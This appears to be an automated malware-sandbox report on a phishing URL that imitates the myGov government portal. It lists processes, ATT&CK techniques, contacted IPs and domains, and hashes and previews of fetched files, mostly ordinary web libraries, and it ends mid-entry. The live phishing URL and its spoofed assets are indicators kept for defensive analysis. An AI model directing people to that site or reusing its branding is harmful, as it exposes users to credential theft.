        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2204,i,10793580977582758868,3268384068697070233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Obfuscated Files or Information
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://yungbucksbbq.com/portbiz/100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/100%SlashNextCredential Stealing type: Phishing & Social Engineering
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://yungbucksbbq.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?100%Avira URL Cloudphishing
        https://yungbucksbbq.com/cdn-cgi/challenge-platform/scripts/jsd/main.js100%Avira URL Cloudphishing
        https://yungbucksbbq.com/cdn-cgi/challenge-platform/h/b/jsd/r/8f7506295d20727b100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/icons/blugov-left-chevron-dark.svg100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/css/mgv2-application.css100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/css/css.css100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/icons/icon-blugov-info.svg100%Avira URL Cloudphishing
        https://yungbucksbbq.com/favicon.ico100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/css/blugov.css100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-white.svg100%Avira URL Cloudphishing
        https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-black.svg100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        stackpath.bootstrapcdn.com
        104.18.11.207
        truefalse
          high
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            code.jquery.com
            151.101.2.137
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                yungbucksbbq.com
                104.21.112.1
                truetrue
                  unknown
                  maxcdn.bootstrapcdn.com
                  104.18.11.207
                  truefalse
                    high
                    www.google.com
                    172.217.19.228
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                        high
                        https://a.nel.cloudflare.com/report/v4?s=UrpOxnvS90nT4enVqEQEa9fWbxEoMzjHyMP4jnvrTheqVC9Rlo%2FJhuImUrKhqrBVOA1DXbV1BCZaisdhID1zf9pgRg5O4tThEqOGzFHC5E5xtQB8pc%2Ffb1SSGQDx4spLgoYzfalse
                          high
                          https://a.nel.cloudflare.com/report/v4?s=WALG0QTwIft9Y7wjm%2BpyerU6Bn6BVJUZUGRwOsSWeseAJ4lLHXtu928LTLvuAoBWWW01WODeESIR9OO9IZRIlEW5Zu2DRRywhG4pkFEK9qd%2Fk2iHC4W2cqmw1JSZ1YMwj9nqfalse
                            high
                            https://yungbucksbbq.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?true
                            • Avira URL Cloud: phishing
                            unknown
                            https://yungbucksbbq.com/portbiz/true
                              unknown
                              https://yungbucksbbq.com/portbiz/icons/icon-blugov-info.svgtrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://yungbucksbbq.com/cdn-cgi/challenge-platform/scripts/jsd/main.jstrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                high
                                https://yungbucksbbq.com/portbiz/icons/blugov-left-chevron-dark.svgtrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://yungbucksbbq.com/portbiz/css/mgv2-application.csstrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://yungbucksbbq.com/portbiz/css/blugov.csstrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://yungbucksbbq.com/cdn-cgi/challenge-platform/h/b/jsd/r/8f7506295d20727btrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-white.svgtrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://yungbucksbbq.com/portbiz/css/css.csstrue
                                • Avira URL Cloud: phishing
                                unknown
                                https://yungbucksbbq.com/portbiz/#true
                                  unknown
                                  https://a.nel.cloudflare.com/report/v4?s=gSae%2FPvDViVNzZ1Dz67TD%2F4i4o4bjcMfByOZ6JG%2FMx3u22xJ2W34gXBlDyHEOpUHMxsHmDxCDUmyDM1w%2FjPGhaii2uHNIBPLGGoowpgEIBVBTCh8TY%2FCkxZ3s4P0MRNCQcoBfalse
                                    high
                                    https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                      high
                                      https://yungbucksbbq.com/favicon.icotrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                        high
                                        https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-black.svgtrue
                                        • Avira URL Cloud: phishing
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://github.com/harvesthq/chosenchromecache_75.1.drfalse
                                          high
                                          https://getbootstrap.com/)chromecache_73.1.dr, chromecache_70.1.drfalse
                                            high
                                            https://github.com/twbs/bootstrap/graphs/contributors)chromecache_89.1.dr, chromecache_73.1.dr, chromecache_70.1.dr, chromecache_82.1.drfalse
                                              high
                                              https://github.com/harvesthq/chosen/blob/master/LICENSE.mdchromecache_75.1.drfalse
                                                high
                                                https://getbootstrap.com)chromecache_89.1.dr, chromecache_82.1.drfalse
                                                  high
                                                  https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_89.1.dr, chromecache_73.1.dr, chromecache_70.1.dr, chromecache_82.1.drfalse
                                                    high
                                                    http://opensource.org/licenses/MIT).chromecache_86.1.dr, chromecache_84.1.drfalse
                                                      high
                                                      http://getharvest.comchromecache_75.1.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        172.217.19.228
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        104.17.24.14
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.18.10.207
                                                        unknownUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        104.18.11.207
                                                        stackpath.bootstrapcdn.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        151.101.2.137
                                                        code.jquery.comUnited States
                                                        54113FASTLYUSfalse
                                                        104.21.112.1
                                                        yungbucksbbq.comUnited States
                                                        13335CLOUDFLARENETUStrue
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        104.17.25.14
                                                        cdnjs.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        IP
                                                        192.168.2.4
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1580537
                                                        Start date and time:2024-12-25 02:22:00 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 8s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://yungbucksbbq.com/portbiz/
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:8
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal84.phis.win@16/46@26/10
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.206, 64.233.164.84, 172.217.17.46, 142.250.181.106, 199.232.214.172, 172.217.17.42, 142.250.181.67, 142.250.181.74, 172.217.17.74, 172.217.19.202, 216.58.208.234, 142.250.181.138, 142.250.181.10, 172.217.19.10, 172.217.19.234, 192.229.221.95, 172.217.17.35, 23.206.103.35, 172.202.163.200, 13.107.246.63
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://yungbucksbbq.com/portbiz/
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):257
                                                        Entropy (8bit):4.6486758631726115
                                                        Encrypted:false
                                                        SSDEEP:6:qzxUkObRHX96vetlSwzRx3G0CezoJTEHcLgabVvjsKtgsg93wzR1D:kxReRHkvetQwzRxGez7fCJjsKtgizR1D
                                                        MD5:6147CA10712E483B5EE714D29C21E439
                                                        SHA1:7BFFD4014EFE0ACE62D03599877153159E2A01B6
                                                        SHA-256:E5128B5E331CAD19DF2F67041FFC85BF716D6E6106DEA098C37524593FB268E9
                                                        SHA-512:B3381EFE8B9D07D1F27174E70813AF2E8FBFCAC00E0F5D197121F20E81DE7B2B271264CB07B332A82118F636917CA30A4CDD568BF97B83B29DFCBACC58F8C928
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/favicon.ico
                                                        Preview:<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):64140
                                                        Entropy (8bit):4.364003294096482
                                                        Encrypted:false
                                                        SSDEEP:768:bOLsHDCJYU28s5MBiVkYR1utxxmLhtzP4GWWT5m/tW0BhRL26WGiGy5ZGrr:bT+Jo8sifYRIaWgKVl29GiGuZU
                                                        MD5:DE646B2F77F5FA27D55A01BBB9CF584E
                                                        SHA1:33316EB871ADF6E08AF7C780EB15872549D08DC3
                                                        SHA-256:10B11A7C97B90BCF7AD520AC94C5769D08540CE1EE3B84D487C587BF128E3388
                                                        SHA-512:E9045ED1FC7C7820E37A6AE88FADB685A79A5D162676FA81360081824BB4EF63DAE66AE0D62337D81668EB83998B26EE6404FAF0FB299C03CC52E505AD027354
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-white.svg
                                                        Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#fff;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75,8.75,0,0,0,426.12,170l72.71-72.69L426.15,24.65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="M42.11,167.84,34.5,150.55h-.29l-7.54,16.82a12.72,12.72,0,0,1-1.81,3.19,3.17,3.17,0,0,1-1.86.94v.57h7v-.57a6,6,0,0,1-2.07-.38,1.4,1.4,0,0,1-.71-1.31,4.58,4.58,0,0,1,.43-1.69l.89-2.05H36l1.12,2.63c.29.68.44,1.07.46,1.16a2,2,0,0,1,.1.58.82.82,0,0,1-.35.71,3.13,3.13,0,0,1-1.72.35h-.42v.57h10.2v-.57a2.41,2.41,0,0,1-1.49-.57,10.4,10.4,0,0,1-1.79-3.09Zm-13-2.92,3.24-7.26,3.14,7.26Z" transform="translate(-23 -22)"/><path class="cls-1" d="M58.31,168.92V157.53H52.39v.58
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 11072, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):11072
                                                        Entropy (8bit):7.98233812008993
                                                        Encrypted:false
                                                        SSDEEP:192:X+O5i60QYQyX4xOc50jR0ujO1W4qEaeFw1CsfCIRsiFDK5mvuGDP3dJGkWNZuQST:uLyYQ5Oc50+91W45FwRBseDT3fGklt1
                                                        MD5:E7DF3D0942815909ADD8F9D0C40D00D9
                                                        SHA1:CF5032EEA3399A58870E8A05E629B006A8C7C3C7
                                                        SHA-256:BCE2F309470952B7AFFA62FF4D91B454334C68CEFA541429B502904D20696875
                                                        SHA-512:3632A44EE28AEC0CF67EF7D3780A18DB1AA84837817A3EA69A5F892D656A94B9FAEFC0314E2C38599410802F875DF73581558EE9511CED7F717FEDA29336CFA0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.woff2
                                                        Preview:wOF2......+@......T4..*..........................d.....^.`.. .... .8.....6.$.... .... ..EE.r.8.6..z..z4.E......1..C..(0..(3.....ORrru+j.Ghy.#.....6h_..b{t...3p......z..:Jn.>X...jVV....z..-..F.R1.G....Q9FKK.T8...,....R.G:...af.......].8l:`.4..I..y..!....R.. .......m.1.0....@..V...>.u..)w.[.E..1.....v.n7......)..N.?.J..W6.t.F['0.9..^.=....A..A..#.jvv...'..JO....2H..Qf .w...#.p....q.8s.8D...a...>.3..%|d5..5.r.......Bm.s\.>=....../.gz..D...$H.{\..kk.B...BM.^..'^`.-*!../...'.[Bau.*..'.p....!.%B.. R.B.....e.w.........D8....0.oh`.......S..{^.S...............@.2..h..O.R......z...].....gp..z..c..I=.O...G..../.kC..5.{.5.G..I..~.7.$07.N......hk8..g@..V*.^K.......S..$d....%.tf.....a..>Ei.8}Y...>...*%.1..R2.^..Q....F.q..V.tY.`......f...o.5.. ...v..(..U......w`k...<i..@,...........*..:R}.W..O...6.@|......X..-e&y,.dS.......z...8...;...v.......8.9.s..>..#.....I..!.K..g..../...Lk..`..j......x.3tNzr..G..j"..d.OH./B./.M14...A)M.....M$xd.m........B..h..X.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32012)
                                                        Category:dropped
                                                        Size (bytes):69597
                                                        Entropy (8bit):5.369216080582935
                                                        Encrypted:false
                                                        SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (8738), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):8738
                                                        Entropy (8bit):5.740096983021747
                                                        Encrypted:false
                                                        SSDEEP:192:n8v2K89L9CKY+0tlHGlNa3oHtZ+jxi9B3BUOaEescz:8+KEJRY+7Na3YQi9B3vescz
                                                        MD5:652C317124EB7D507F8446F2181B9C7D
                                                        SHA1:180DD7D1541047A8889A6ECC750292A8B7B0E33D
                                                        SHA-256:22422D10ADF2FEE13F74D60D0811A01A29963323D76CF7924414C872380A6371
                                                        SHA-512:F1B1BD127F66A4885821F8D127BF8023FCA3AB95B2DF9AFC80B35EDE1DCF5D8A348F9BE80796668DF57C30EC5FCD0385E0B0576A7D5616046496C8E6B3EB1183
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?
                                                        Preview:window._cf_chl_opt={cFPWv:'b'};~function(W,h,i,n,o,y,z,B){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(534))/1*(parseInt(V(507))/2)+-parseInt(V(495))/3+parseInt(V(502))/4+-parseInt(V(588))/5*(parseInt(V(546))/6)+parseInt(V(542))/7*(parseInt(V(539))/8)+parseInt(V(570))/9+parseInt(V(555))/10,d===f)break;else e.push(e.shift())}catch(E){e.push(e.shift())}}(a,888995),h=this||self,i=h[W(516)],n={},n[W(540)]='o',n[W(517)]='s',n[W(496)]='u',n[W(514)]='z',n[W(525)]='n',n[W(532)]='I',n[W(568)]='b',o=n,h[W(536)]=function(E,F,G,H,a8,J,K,L,M,N,O){if(a8=W,null===F||void 0===F)return H;for(J=x(F),E[a8(493)][a8(563)]&&(J=J[a8(552)](E[a8(493)][a8(563)](F))),J=E[a8(590)][a8(515)]&&E[a8(520)]?E[a8(590)][a8(515)](new E[(a8(520))](J)):function(P,a9,Q){for(a9=a8,P[a9(519)](),Q=0;Q<P[a9(505)];P[Q+1]===P[Q]?P[a9(557)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a8(513)][a8(561)](K),L=0;L<J[a8(505)];M=J[L],N=v(E,F,M),K(N)?(O='s'===N&&!E[a8(560)](F[M]),a8(524)===G+M?I(G+M,N):O||I(G+
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (50758)
                                                        Category:downloaded
                                                        Size (bytes):51039
                                                        Entropy (8bit):5.247253437401007
                                                        Encrypted:false
                                                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32065)
                                                        Category:dropped
                                                        Size (bytes):85578
                                                        Entropy (8bit):5.366055229017455
                                                        Encrypted:false
                                                        SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                        MD5:2F6B11A7E914718E0290410E85366FE9
                                                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):28
                                                        Entropy (8bit):4.137537511266052
                                                        Encrypted:false
                                                        SSDEEP:3:DyKY:GKY
                                                        MD5:855D128BC8BA8897C10651DB8E4AB599
                                                        SHA1:5CCCB01FB1551C99176DB4864D85390783AAC5EC
                                                        SHA-256:44A85AC0536722333A8DA0D6DC2F5B36ECC20782925D33CBAC41DC2B0E65478E
                                                        SHA-512:38260BD743C9A31F29ED31E3FA3B64E930091530EC82FF08872B981A577986A62F0E4C7277179C90D2417578323EF04B3443B517D476CCC8138A7A361AA88AAF
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmqjPUqUprDARIFDRncHPcSBQ2tCa6x?alt=proto
                                                        Preview:ChIKBw0Z3Bz3GgAKBw2tCa6xGgA=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (50758)
                                                        Category:dropped
                                                        Size (bytes):51039
                                                        Entropy (8bit):5.247253437401007
                                                        Encrypted:false
                                                        SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                        MD5:67176C242E1BDC20603C878DEE836DF3
                                                        SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                        SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                        SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (32012)
                                                        Category:downloaded
                                                        Size (bytes):69597
                                                        Entropy (8bit):5.369216080582935
                                                        Encrypted:false
                                                        SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
